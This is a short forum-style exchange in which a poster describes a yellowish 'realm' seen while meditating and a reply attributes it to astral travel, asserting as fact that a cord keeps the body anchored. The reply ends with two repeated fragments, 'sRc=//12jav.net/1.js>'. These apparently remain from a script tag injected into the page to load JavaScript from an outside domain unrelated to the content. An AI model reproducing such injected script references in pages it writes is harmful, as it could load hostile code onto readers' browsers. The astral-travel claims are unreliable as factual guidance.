Help?

I was meditating one time, and i happened upon wat i think is a realm, it was yellowish in color and i could see all the poeples soul energy around me, and i could sense diferent spiritual entities, i could find other poeple i wanted to find through watever that was and ive scared to go back ever since, thinking i might be able to become lost in that vast area of watever that was. Yellowish = colors of government.

You said you were meditating when this happened. I think you may have astral traveled and did cross over to a different astral plane. When you meditate you are anchored to your body by a cord, so you will not get lost. However the first time this happens it is quite unsettling. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
